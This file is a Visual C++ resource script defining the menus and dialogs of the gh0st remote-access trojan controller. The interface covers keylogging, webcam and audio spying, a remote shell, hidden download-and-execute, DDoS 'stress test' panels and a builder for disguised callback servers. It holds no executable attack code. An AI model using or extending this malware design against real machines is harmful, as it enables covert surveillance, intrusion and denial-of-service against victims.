// Microsoft Visual C++ generated resource script.
//
#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "afxres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// 中文(简体，中国) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
#pragma code_page(936)

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE 
BEGIN
    "resource.h\0"
END

2 TEXTINCLUDE 
BEGIN
    "#include ""afxres.h""\r\n"
    "\0"
END

3 TEXTINCLUDE 
BEGIN
    "#define _AFX_NO_SPLITTER_RESOURCES\r\n"
    "#define _AFX_NO_OLE_RESOURCES\r\n"
    "#define _AFX_NO_TRACKER_RESOURCES\r\n"
    "#define _AFX_NO_PROPERTY_RESOURCES\r\n"
    "\r\n"
    "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)\r\n"
    "#ifdef _WIN32\r\n"
    "LANGUAGE 4, 2\r\n"
    "#pragma code_page(936)\r\n"
    "#endif //_WIN32\r\n"
    "#include ""res\\gh0st.rc2""  // non-Microsoft Visual C++ edited resources\r\n"
    "#include ""l.chs\\afxres.rc""          // Standard components\r\n"
    "#endif\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Icon
//

// Icon with lowest ID value placed first to ensure application icon
// remains consistent on all systems.
IDR_MAINFRAME           ICON                    "res\\gh0st.ico"
IDI_WEBCAM              ICON                    "res\\webcam.ico"
IDI_CMDSHELL            ICON                    "res\\cmdshell.ico"
IDI_KEYBOARD            ICON                    "res\\keyboard.ico"
IDI_SYSTEM              ICON                    "res\\system.ico"
IDI_AUDIO               ICON                    "res\\audio.ico"
IDI_ICON_DDOS           ICON                    "res\\CS icon.ico"
IDI_ICON_SIFT           ICON                    "res\\search.ico"
IDI_ICON_SETING         ICON                    "res\\Seting.ICO"
IDI_ICON_TOOL           ICON                    "res\\102.ico"
IDI_ICON_MD5            ICON                    "res\\202.ico"
IDI_PLUGIN              ICON                    "res\\插件管理.ico"
IDI_EVENT               ICON                    "res\\event.ico"

/////////////////////////////////////////////////////////////////////////////
//
// Menu
//

IDR_MAINFRAME MENU
BEGIN
    POPUP "选项(&O)"
    BEGIN
        MENUITEM "设置",                          IDM_CONFIGING
        MENUITEM "更新域名(&D)",                    IDM_GXIP
    END
    POPUP "帮助(&H)"
    BEGIN
        MENUITEM "关于 ghost4.0(&A)...",          ID_APP_ABOUT
    END
    POPUP "皮肤(&S)"
    BEGIN
        MENUITEM "加载皮肤(A)",                     ID_ADD_SKIN
        POPUP "选择皮肤(&T)"
        BEGIN
            MENUITEM "黑色皮肤(&B)",                    ID_BLACK_SKIN
            MENUITEM "蓝色皮肤(L)",                     ID_BLUE_SKIN
            MENUITEM "红色皮肤(&R)",                    ID_RED_SKIN
            MENUITEM "银色皮肤(&Y)",                    ID_SILVER_SKIN
        END
        MENUITEM "去除皮肤(&D)",                    ID_DEL_SKIN
        MENUITEM "调整色调(&C)",                    ID_CHANGE_SKIN
    END
END

IDR_LIST MENU
BEGIN
    POPUP "MENU"
    BEGIN
        MENUITEM "压力测试(&D)",                    IDM_DDOS
        MENUITEM SEPARATOR
        MENUITEM "屏幕控制(&C)",                    IDM_SCREENSPY
        MENUITEM "文件管理(&F)",                    IDM_FILEMANAGER
        MENUITEM "远程终端(&T)",                    IDM_REMOTESHELL
        MENUITEM "语音监听(&W)",                    IDM_AUDIO_LISTEN
        MENUITEM "系统管理(&M)",                    IDM_SYSTEM
        MENUITEM "视频查看(&V)",                    IDM_WEBCAM
        MENUITEM "键盘记录(&K)",                    IDM_KEYBOARD
        MENUITEM "发送消息(&N)",                    IDM_SENDMESSAGE
        MENUITEM "批量命令(&B)",                    IDM_BATCH
        MENUITEM "统计主机(&T)",                    IDM_COUNTHOST
        MENUITEM "更改备注(&R)",                    IDM_RENAME_REMARK
        MENUITEM "无net添加(&Z)",                  IDM_ADD_USER
        MENUITEM "开启代理(&Q)",                    ID_opendaili
        MENUITEM "开启终端(&E)",                    ID_open3389
        MENUITEM SEPARATOR
        POPUP "其它功能(&O)"
        BEGIN
            MENUITEM "下载执行(&D)",                    IDM_DOWNEXEC
            MENUITEM "下载更新(&U)",                    IDM_UPDATE_SERVER
            POPUP "访问网址(&V)"
            BEGIN
                MENUITEM "隐藏(&H)",                      IDM_OPEN_URL_HIDE
                MENUITEM "显示(&S)",                      IDM_OPEN_URL_SHOW
            END
        END
        POPUP "会话管理(&S)"
        BEGIN
            MENUITEM "注销(&L)",                      IDM_LOGOFF
            MENUITEM "重启(&R)",                      IDM_REBOOT
            MENUITEM "关机(&S)",                      IDM_SHUTDOWN
            MENUITEM "断开(&D)",                      IDM_DISCONNECT
            MENUITEM SEPARATOR
            MENUITEM "卸载(&U)",                      IDM_REMOVE
        END
        MENUITEM SEPARATOR
    END
END

IDR_FILEMANAGER MENU
BEGIN
    POPUP "FileManger"
    BEGIN
        MENUITEM "传输(&T)",                      IDM_TRANSFER
        MENUITEM "重命名(&R)",                     IDM_RENAME
        MENUITEM "删除(&D)",                      IDM_DELETE
        MENUITEM "新建文件夹(&N)",                   IDM_NEWFOLDER
        MENUITEM SEPARATOR
        MENUITEM "本地打开(&O)",                    IDM_LOCAL_OPEN
        POPUP "远程打开(&O)"
        BEGIN
            MENUITEM "显示运行(&S)",                    IDM_REMOTE_OPEN_SHOW
            MENUITEM "隐藏运行(&H)",                    IDM_REMOTE_OPEN_HIDE
        END
        MENUITEM SEPARATOR
        MENUITEM "刷新(&R)",                      IDM_REFRESH
    END
END

IDR_LOCAL_VIEW MENU
BEGIN
    POPUP "Lview"
    BEGIN
        MENUITEM "大图标",                         IDM_LOCAL_BIGICON
        MENUITEM "小图标",                         IDM_LOCAL_SMALLICON
        MENUITEM "列表",                          IDM_LOCAL_LIST
        MENUITEM "详细信息",                        IDM_LOCAL_REPORT
    END
END

IDR_REMOTE_VIEW MENU
BEGIN
    POPUP "Rview"
    BEGIN
        MENUITEM "大图标",                         IDM_REMOTE_BIGICON
        MENUITEM "小图标",                         IDM_REMOTE_SMALLICON
        MENUITEM "列表",                          IDM_REMOTE_LIST
        MENUITEM "详细信息",                        IDM_REMOTE_REPORT
    END
END

IDR_PSLIST MENU
BEGIN
    POPUP "PSLIST"
    BEGIN
        MENUITEM "结束(&T)",                      IDM_KILLPROCESS
        MENUITEM "刷新(&R)",                      IDM_REFRESHPSLIST
    END
END

IDR_MINIMIZE MENU
BEGIN
    POPUP "MINIMIZE"
    BEGIN
        MENUITEM "隐藏",                          IDM_HIDE
        MENUITEM "显示",                          IDM_SHOW
        MENUITEM "退出",                          IDM_EXIT
    END
END

IDR_MENU_REPORT MENU
BEGIN
    POPUP "右键菜单"
    BEGIN
        MENUITEM "开始",                          IDM_START
        MENUITEM "停止",                          IDM_STOP
        MENUITEM "删除",                          IDM_DELETE_LIST
    END
END

IDR_BATCH_MENU MENU
BEGIN
    POPUP "批量命令菜单"
    BEGIN
        MENUITEM "删除",                          IDM_DELETEBATCH
    END
END

IDR_PLUGIN MENU
BEGIN
    POPUP "插件菜单"
    BEGIN
        MENUITEM "刷新",                          IDM_REFURBISH
        MENUITEM "启动",                          IDM_PLUGIN_START
        MENUITEM "结束",                          IDM_PLUGIN_END
        MENUITEM "删除",                          IDM_PLUGIN_DELETE
    END
END

IDR_MENU_LOG_LIST MENU
BEGIN
    POPUP "LOGMENU"
    BEGIN
        MENUITEM "删除选定日志  ",                    ID_DELETE_ITEM
        MENUITEM "清空日志列表 ",                     ID_EMPTY_ITEM
        MENUITEM "保存选定日志 ",                     ID_SAVE_LOG
        MENUITEM "复制到剪切板 ",                     ID_COPY
    END
END


/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_ABOUTBOX DIALOG 0, 0, 260, 149
STYLE DS_SETFONT | WS_POPUP
FONT 9, "宋体"
BEGIN
    LTEXT           "",IDC_STATIC_ABOUT,0,0,260,150
END

IDD_BUILD DIALOG 0, 0, 411, 141
STYLE DS_SETFONT | WS_CHILD
FONT 9, "宋体"
BEGIN
    CONTROL         "",IDC_STATIC,"Static",SS_ETCHEDHORZ,7,118,290,1
    LTEXT           "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008  http://www.xcodez.com/",IDC_STATIC_VER,7,123,327,8
    LTEXT           "---- C.Rufus Security Team ----",IDC_STATIC,7,105,141,8
    GROUPBOX        "服务端生成",IDC_STATIC,7,6,397,95
    EDITTEXT        IDC_URL,67,21,292,14,ES_AUTOHSCROLL | WS_DISABLED
    PUSHBUTTON      "生成服务端",IDC_BUILD,14,80,52,14
    LTEXT           "HTTP上线网址",IDC_STATIC,14,24,49,8
    LTEXT           "域名上线字串",IDC_STATIC,14,44,49,8
    EDITTEXT        IDC_DNS_STRING,67,40,327,14,ES_AUTOHSCROLL
    CONTROL         "启用",IDC_ENABLE_HTTP,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,367,23,28,10
    LTEXT           "服务显示名称",IDC_STATIC,14,62,49,8
    EDITTEXT        IDC_SERVICE_DISPLAYNAME,67,59,104,14,ES_AUTOHSCROLL
    LTEXT           "服务描述",IDC_STATIC,175,62,33,8
    EDITTEXT        IDC_SERVICE_DESCRIPTION,212,59,182,14,ES_AUTOHSCROLL
    LTEXT           "注意：域名上线字串相同或者HTTP上线字串相同的服务端不能同时安装在一台主机上 !!!",IDC_STATIC,79,83,316,8
END

IDD_FILE DIALOGEX 0, 0, 358, 275
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "文件管理"
FONT 9, "宋体", 0, 0, 0x1
BEGIN
    COMBOBOX        IDC_LOCAL_PATH,35,5,140,44,CBS_DROPDOWN | CBS_AUTOHSCROLL | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    CONTROL         "List1",IDC_LIST_LOCAL,"SysListView32",LVS_AUTOARRANGE | LVS_EDITLABELS | WS_BORDER | WS_TABSTOP,0,24,357,106,WS_EX_ACCEPTFILES
    COMBOBOX        IDC_REMOTE_PATH,35,136,140,58,CBS_DROPDOWN | CBS_AUTOHSCROLL | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    CONTROL         "List1",IDC_LIST_REMOTE,"SysListView32",LVS_SHOWSELALWAYS | LVS_AUTOARRANGE | LVS_EDITLABELS | WS_BORDER | WS_TABSTOP,0,155,357,106
    LTEXT           "本地",IDC_STATIC,13,7,17,8
    LTEXT           "远程",IDC_STATIC_REMOTE,13,138,17,8
END

IDD_SETTINGS DIALOG 0, 0, 421, 156
STYLE DS_SETFONT | WS_CHILD
FONT 9, "宋体"
BEGIN
    GROUPBOX        "上线特征码",IDC_STATIC,7,38,407,83
    LTEXT           "上线主机",IDC_STATIC,13,51,33,8
    EDITTEXT        IDC_REMOTE_HOST,54,47,86,14,ES_CENTER | ES_AUTOHSCROLL
    LTEXT           "端口",IDC_STATIC,146,50,17,8
    EDITTEXT        IDC_REMOTE_PORT,167,47,42,14,ES_CENTER | ES_AUTOHSCROLL | ES_NUMBER
    EDITTEXT        IDC_ENCODE,54,101,354,14,ES_CENTER | ES_AUTOHSCROLL | ES_READONLY
    LTEXT           "上线字串",IDC_STATIC,13,103,33,8
    GROUPBOX        "系统配置",IDC_STATIC,7,6,407,29
    PUSHBUTTON      "应用",IDC_RESETPORT,218,15,41,14
    LTEXT           "监听端口",IDC_STATIC,15,19,33,8
    EDITTEXT        IDC_LISTEN_PORT,54,16,40,13,ES_CENTER | ES_AUTOHSCROLL | ES_NUMBER
    LTEXT           "连接上限",IDC_STATIC,100,19,33,8
    EDITTEXT        IDC_CONNECT_MAX,137,16,40,13,ES_CENTER | ES_AUTOHSCROLL | ES_NUMBER
    CONTROL         "自动",IDC_CONNECT_AUTO,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,182,18,29,10
    LTEXT           "代理主机",IDC_STATIC,13,69,33,8
    EDITTEXT        IDC_PROXY_HOST,54,66,132,14,ES_CENTER | ES_AUTOHSCROLL
    LTEXT           "端口",IDC_STATIC,193,69,17,8
    EDITTEXT        IDC_PROXY_PORT,218,66,41,14,ES_CENTER | ES_AUTOHSCROLL | ES_NUMBER
    CONTROL         "需要验证",IDC_CHECK_AUTH,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,270,86,43,10
    CONTROL         "使用socks5代理上线",IDC_CHECK_PROXY,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,270,68,84,10
    LTEXT           "用 户 名",IDC_STATIC,14,86,33,8
    EDITTEXT        IDC_PROXY_USER,54,83,88,14,ES_CENTER | ES_AUTOHSCROLL
    EDITTEXT        IDC_PROXY_PASS,168,83,91,14,ES_CENTER | ES_PASSWORD | ES_AUTOHSCROLL
    LTEXT           "密码",IDC_STATIC,145,86,17,8
    PUSHBUTTON      "测试",IDC_TEST_PROXY,317,83,37,14
    PUSHBUTTON      "测试",IDC_TEST_MASTER,218,47,41,14
    GROUPBOX        "系统提示",IDC_STATIC,7,123,407,26
    LTEXT           "Static",IDC_SYSTEM_TIPS,13,134,394,8
    CONTROL         "禁用上线时气泡提示",IDC_DISABLE_POPTIPS,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,270,17,86,10
    ICON            IDR_MAINFRAME,IDC_STATIC,375,61,20,20
    GROUPBOX        "",IDC_STATIC,365,45,42,49
    CONTROL         "保存当前为默认配置",IDC_SAVEAS_DEFAULT,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,270,50,84,10
END

IDD_TRANSFERMODE_DLG DIALOG 0, 0, 371, 75
STYLE DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "确认文件替换"
FONT 9, "宋体"
BEGIN
    GROUPBOX        "",IDC_STATIC,6,2,359,66
    LTEXT           "Tips",IDC_TIPS,13,13,342,23
    PUSHBUTTON      "覆盖",IDC_OVERWRITE,12,42,43,14
    PUSHBUTTON      "继传",IDC_ADDITION,113,42,43,14
    PUSHBUTTON      "跳过",IDC_JUMP,218,42,43,14
    PUSHBUTTON      "全部覆盖",IDC_OVERWRITE_ALL,63,42,43,14
    PUSHBUTTON      "全部继传",IDC_ADDITION_ALL,166,42,43,14
    PUSHBUTTON      "全部跳过",IDC_JUMP_ALL,267,42,43,14
    PUSHBUTTON      "取消",IDC_CANCEL,316,42,43,14
END

IDD_SCREENSPY DIALOG 0, 0, 510, 329
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "Dialog"
FONT 9, "宋体"
BEGIN
END

IDD_WEBCAM DIALOG 0, 0, 176, 144
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "Dialog"
FONT 9, "@宋体"
BEGIN
END

IDD_KEYBOARD DIALOG 0, 0, 328, 255
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "键盘记录"
FONT 9, "宋体"
BEGIN
    EDITTEXT        IDC_EDIT,0,0,327,255,ES_MULTILINE | ES_AUTOVSCROLL | ES_READONLY | ES_WANTRETURN | WS_VSCROLL
END

IDD_SYSTEM DIALOG 0, 0, 274, 259
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "系统管理"
FONT 9, "宋体"
BEGIN
    CONTROL         "List1",IDC_LIST_PROCESS,"SysListView32",LVS_REPORT | WS_BORDER | WS_TABSTOP,0,19,273,240
    CONTROL         "Tab1",IDC_TAB,"SysTabControl32",TCS_HOTTRACK | TCS_BUTTONS,0,2,267,13
    CONTROL         "List1",IDC_LIST_WINDOWS,"SysListView32",LVS_REPORT | WS_BORDER | WS_TABSTOP,0,19,273,240
    CONTROL         "List1",IDC_LIST_DIALUPASS,"SysListView32",LVS_REPORT | WS_BORDER | WS_TABSTOP,0,19,273,240
END

IDD_SHELL DIALOG 0, 0, 439, 270
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
FONT 9, "宋体"
BEGIN
    EDITTEXT        IDC_EDIT,0,0,438,269,ES_MULTILINE | ES_AUTOVSCROLL | ES_AUTOHSCROLL | ES_WANTRETURN | WS_VSCROLL | WS_HSCROLL
END

IDD_AUDIO DIALOG 0, 0, 225, 67
STYLE DS_SETFONT | DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "语音监听"
FONT 9, "宋体"
BEGIN
    GROUPBOX        "",IDC_STATIC,6,2,213,59
    CONTROL         "发送本地语音到远程",IDC_SEND_LOCALAUDIO,"Button",BS_AUTOCHECKBOX,12,41,88,10
    LTEXT           "正在监听远程声音 ......",IDC_STATIC,12,15,111,8
    LTEXT           "Microsoft GSM 6.10 Audio CODEC",IDC_STATIC,12,28,120,8
    LTEXT           "Receive 0 KBytes",IDC_TIPS,135,28,80,8
END

IDD_ATTACK_DIALOG DIALOG 0, 0, 530, 319
STYLE DS_SETFONT | WS_MINIMIZEBOX | WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "压力测试系统"
FONT 9, "宋体"
BEGIN
    CONTROL         "Tab1",IDC_DDOS_ATTACK,"SysTabControl32",0x0,0,0,529,305
END

IDD_FLOWATTACK_DIALOG DIALOGEX 0, 0, 471, 306
STYLE DS_SETFONT | WS_CHILD
FONT 9, "宋体", 0, 0, 0x0
BEGIN
    CONTROL         "List1",IDC_LIST_TARGET,"SysListView32",LVS_REPORT | LVS_SINGLESEL | WS_BORDER | WS_TABSTOP,0,64,470,210
    LTEXT           "目标:",IDC_STATIC_2,3,10,21,8
    EDITTEXT        IDC_TARGET_WEB,25,8,130,13,ES_AUTOHSCROLL
    LTEXT           "端口:",IDC_STATIC_4,3,43,21,8
    EDITTEXT        IDC_ATTCKPORT,25,42,40,13,ES_AUTOHSCROLL | ES_NUMBER
    LTEXT           "测试线程:",IDC_STATIC_7,165,11,37,8
    EDITTEXT        IDC_THREADNUMS,305,8,35,13,ES_AUTOHSCROLL | ES_NUMBER
    LTEXT           "持续时间:",IDC_STATIC_8,165,26,37,8
    LTEXT           "主机数量:",IDC_STATIC_6,73,44,37,8
    EDITTEXT        IDC_HOSTNUMS,113,42,35,13,ES_AUTOHSCROLL | ES_NUMBER
    CONTROL         "Slider1",IDC_SLIDER_THREAD,"msctls_trackbar32",TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,200,7,100,14
    EDITTEXT        IDC_ATTACKTIMES,305,24,35,13,ES_AUTOHSCROLL | ES_NUMBER
    CONTROL         "Slider1",IDC_SLIDER_TIME,"msctls_trackbar32",TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,200,24,100,14
    CONTROL         "Spin1",IDC_SPIN_NUM,"msctls_updown32",UDS_WRAP | UDS_SETBUDDYINT | UDS_ALIGNRIGHT | UDS_ARROWKEYS,143,44,11,10
    CONTROL         "新上线主机自动参与",IDC_NEWAUTO,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,254,44,88,10
    CONTROL         "使用已经选中的主机",IDC_SELECTHOST,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,165,44,88,10
    PUSHBUTTON      "添加任务",IDC_ADDTASK,430,10,37,44
    LTEXT           "模式:",IDC_STATIC_3,3,28,21,8
    COMBOBOX        IDC_COMBO_MODEL,25,25,130,160,CBS_DROPDOWNLIST | WS_VSCROLL | WS_TABSTOP
    GROUPBOX        "",IDC_STATIC_1,2,0,343,58
    GROUPBOX        "轮回CC参数",IDC_STATIC_9,350,0,71,58
    LTEXT           "起始:",IDC_STATIC_10,357,14,21,8
    LTEXT           "结束:",IDC_STATIC_11,357,40,21,8
    EDITTEXT        IDC_STARTVAR,380,12,34,15,ES_AUTOHSCROLL | ES_NUMBER
    EDITTEXT        IDC_ENDVAR,380,36,34,15,ES_AUTOHSCROLL | ES_NUMBER
    EDITTEXT        IDC_STATIC_TIP,0,276,470,29,ES_MULTILINE | ES_AUTOHSCROLL | ES_WANTRETURN
END

IDD_CUSTOMATTACK_DIALOG DIALOG 0, 0, 531, 293
STYLE DS_SETFONT | WS_CHILD
FONT 9, "宋体"
BEGIN
    EDITTEXT        IDC_EDIT_DECIMAL,0,2,263,177,ES_MULTILINE | ES_WANTRETURN | WS_VSCROLL
    EDITTEXT        IDC_EDIT_HEX,265,2,263,177,ES_MULTILINE | ES_WANTRETURN | WS_VSCROLL
    EDITTEXT        IDC_EDIT_TIP,0,251,530,40,ES_MULTILINE | ES_AUTOVSCROLL | ES_AUTOHSCROLL
    GROUPBOX        "自定义攻击模式",IDC_STATIC_20,0,186,530,60
    LTEXT           "目标:",IDC_STATIC_2,10,204,21,8
    EDITTEXT        IDC_TARGET_WEB,32,202,131,13,ES_AUTOHSCROLL
    LTEXT           "端口:",IDC_STATIC_4,108,222,21,8
    EDITTEXT        IDC_ATTCKPORT,129,220,33,13,ES_AUTOHSCROLL | ES_NUMBER
    LTEXT           "线程:",IDC_STATIC_7,168,204,21,8
    EDITTEXT        IDC_THREADNUMS,269,202,27,13,ES_AUTOHSCROLL | ES_NUMBER
    LTEXT           "时间:",IDC_STATIC_8,168,222,21,8
    LTEXT           "主机数量:",IDC_STATIC_6,300,222,37,8
    EDITTEXT        IDC_HOSTNUMS,341,219,35,13,ES_AUTOHSCROLL | ES_NUMBER
    CONTROL         "Slider1",IDC_SLIDER_THREAD,"msctls_trackbar32",TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,190,200,77,14
    EDITTEXT        IDC_ATTACKTIMES,269,219,27,13,ES_AUTOHSCROLL | ES_NUMBER
    CONTROL         "Slider1",IDC_SLIDER_TIME,"msctls_trackbar32",TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,190,220,77,14
    CONTROL         "Spin1",IDC_SPIN_NUM,"msctls_updown32",UDS_WRAP | UDS_SETBUDDYINT | UDS_ALIGNRIGHT | UDS_ARROWKEYS,371,221,11,10
    CONTROL         "新上线主机自动参与",IDC_NEWAUTO,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,387,201,88,10
    CONTROL         "使用已经选中的主机",IDC_SELECTHOST,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,387,221,88,10
    LTEXT           "模式:",IDC_STATIC_3,10,222,21,8
    COMBOBOX        IDC_COMBO_MODEL,32,219,73,70,CBS_DROPDOWNLIST | WS_VSCROLL | WS_TABSTOP
    PUSHBUTTON      "开始",IDC_START_ATTACK,480,198,45,16
    PUSHBUTTON      "停止",IDC_START_STOP,480,218,45,16
    LTEXT           "发包速度:",IDC_STATIC_11,300,204,37,8
    EDITTEXT        IDC_SEND_RATE,341,200,35,13,ES_AUTOHSCROLL | ES_NUMBER
    CONTROL         "Spin1",IDC_SPIN_RATE,"msctls_updown32",UDS_WRAP | UDS_SETBUDDYINT | UDS_ALIGNRIGHT | UDS_ARROWKEYS,371,202,11,10
END

IDD_SIFT_HOST DIALOG 0, 0, 250, 106
STYLE DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "筛选主机"
FONT 9, "宋体"
BEGIN
    GROUPBOX        "",IDC_STATIC,3,0,243,60
    CONTROL         "外网(外网IP)",IDC_RADIO1,"Button",BS_AUTORADIOBUTTON,10,12,60,10
    CONTROL         "内网(内网IP)",IDC_RADIO2,"Button",BS_AUTORADIOBUTTON,85,12,60,10
    CONTROL         "计算机名称/备注",IDC_RADIO3,"Button",BS_AUTORADIOBUTTON,155,12,76,10
    CONTROL         "系统",IDC_RADIO4,"Button",BS_AUTORADIOBUTTON,10,28,48,10
    CONTROL         "视频",IDC_RADIO5,"Button",BS_AUTORADIOBUTTON,85,28,40,10
    CONTROL         "区域",IDC_RADIO6,"Button",BS_AUTORADIOBUTTON,155,28,32,10
    CONTROL         "进程名称",IDC_RADIO7,"Button",BS_AUTORADIOBUTTON,10,43,48,10
    CONTROL         "窗口标题",IDC_RADIO8,"Button",BS_AUTORADIOBUTTON,85,43,48,10
    LTEXT           "筛选内容:",IDC_STATIC,5,68,37,8
    EDITTEXT        IDC_EDIT_DATA,45,65,143,15,ES_AUTOHSCROLL
    PUSHBUTTON      "刷选",IDC_SIFT_HOST,192,66,50,15
    CONTROL         "Progress1",IDC_PROGRESS1,"msctls_progress32",WS_BORDER,0,95,249,10
    LTEXT           "",IDC_SHOWRESULT,15,84,228,10,SS_NOTIFY
    PUSHBUTTON      "使用说明",IDC_BUTTON2,192,40,50,15
    CONTROL         "标识",IDC_RADIO9,"Button",BS_AUTORADIOBUTTON,155,43,32,10
END

IDD_BTACK_DIALOG DIALOG 0, 0, 407, 270
STYLE DS_SETFONT | DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "批量命令"
FONT 9, "宋体"
BEGIN
    CONTROL         "List1",IDC_LIST1,"SysListView32",LVS_REPORT | WS_BORDER | WS_TABSTOP,0,20,407,228
    LTEXT           "类型:",IDC_STATIC,3,5,21,8
    COMBOBOX        IDC_COMBO1,25,3,90,170,CBS_DROPDOWN | CBS_SORT | WS_VSCROLL | WS_TABSTOP
    EDITTEXT        IDC_EDIT_URL,141,3,139,13,ES_AUTOHSCROLL
    LTEXT           "地址:",IDC_STATIC,120,5,21,8
    LTEXT           "间隔时间:",IDC_STATIC,286,6,37,8
    EDITTEXT        IDC_EDIT_TIME,323,3,32,13,ES_AUTOHSCROLL | ES_NUMBER
    PUSHBUTTON      "添加",IDC_ADDBATCH,365,2,37,15
    CONTROL         "Spin1",IDC_SPIN1,"msctls_updown32",UDS_SETBUDDYINT | UDS_ALIGNRIGHT | UDS_ARROWKEYS,344,4,10,10
    CONTROL         "新上线主机自动参与",IDC_CHECK_AUTO,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,196,255,88,10
    PUSHBUTTON      "开始",IDC_BUTTON_START,294,251,50,15
    PUSHBUTTON      "停止",IDC_BUTTON_STOP,352,251,50,15
    LTEXT           "还剩余30条地址可以添加",IDC_COUNT_LINES,3,255,93,8
    CONTROL         "使用已经选中主机",IDC_CHECK_SELECT,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,106,255,80,10
END

IDD_BUILDDIALOG DIALOG 0, 0, 375, 173
STYLE DS_SETFONT | DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "生成服务端"
FONT 9, "宋体"
BEGIN
    GROUPBOX        "服务参数",IDC_STATIC,2,75,180,72
    LTEXT           "服务名:",IDC_STATIC,13,90,29,8
    LTEXT           "服务显示:",IDC_STATIC,5,110,37,8
    LTEXT           "服务描述:",IDC_STATIC,5,130,37,8
    EDITTEXT        IDC_SERVERNAME,43,87,132,15,ES_AUTOHSCROLL
    EDITTEXT        IDC_SERVERDISPLAY,43,106,132,15,ES_AUTOHSCROLL
    EDITTEXT        IDC_SERVERDESCRIPT,43,127,132,15,ES_AUTOHSCROLL
    LTEXT           "释放目录:",IDC_STATIC,188,16,37,8
    LTEXT           "文件名:",IDC_STATIC,194,36,29,8
    EDITTEXT        IDC_FILENAME,228,32,43,14,ES_AUTOHSCROLL
    LTEXT           "文件后缀:",IDC_STATIC,272,36,37,8
    COMBOBOX        IDC_FILESUFFIEX,310,33,47,118,CBS_DROPDOWNLIST | WS_VSCROLL | WS_TABSTOP
    GROUPBOX        "文件释放参数",IDC_STATIC,185,0,180,71
    LTEXT           "文件属性:",IDC_STATIC,188,57,37,8
    COMBOBOX        IDC_FILEATTRIBUTE,228,56,130,130,CBS_DROPDOWNLIST | WS_VSCROLL | WS_TABSTOP
    PUSHBUTTON      "生成",IDC_BUILD,285,131,45,15
    EDITTEXT        IDC_SHOWTIPS,185,79,180,46,ES_MULTILINE | ES_READONLY | ES_WANTRETURN | WS_VSCROLL
    CONTROL         "Progress1",IDC_PROGRESS1,"msctls_progress32",WS_BORDER,7,151,349,10
    LTEXT           "上线域名:",IDC_STATIC,5,19,37,8
    EDITTEXT        IDC_DNS,45,17,80,15,ES_AUTOHSCROLL
    LTEXT           "上线URL:",IDC_STATIC,5,38,33,8
    EDITTEXT        IDC_URLADDR,45,36,131,15,ES_AUTOHSCROLL
    LTEXT           "端口:",IDC_STATIC,128,20,21,8
    EDITTEXT        IDC_PORT,149,17,27,15,ES_AUTOHSCROLL | ES_NUMBER
    PUSHBUTTON      "测试",IDC_TEST,140,54,35,15
    GROUPBOX        "上线参数",IDC_STATIC,1,2,181,70
    CONTROL         "URL上线",IDC_CHECK_URL,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,94,57,44,10
    COMBOBOX        IDC_DIRECTORY,228,10,130,130,CBS_DROPDOWN | WS_VSCROLL | WS_TABSTOP
    LTEXT           "上线标识:",IDC_STATIC,5,55,37,8
    PUSHBUTTON      "随机",IDC_RANDOM,225,131,45,15
    EDITTEXT        IDC_ONLINE_MARK,45,54,43,15,ES_AUTOHSCROLL
END

IDD_CONFIG_DIALOG DIALOG 0, 0, 122, 183
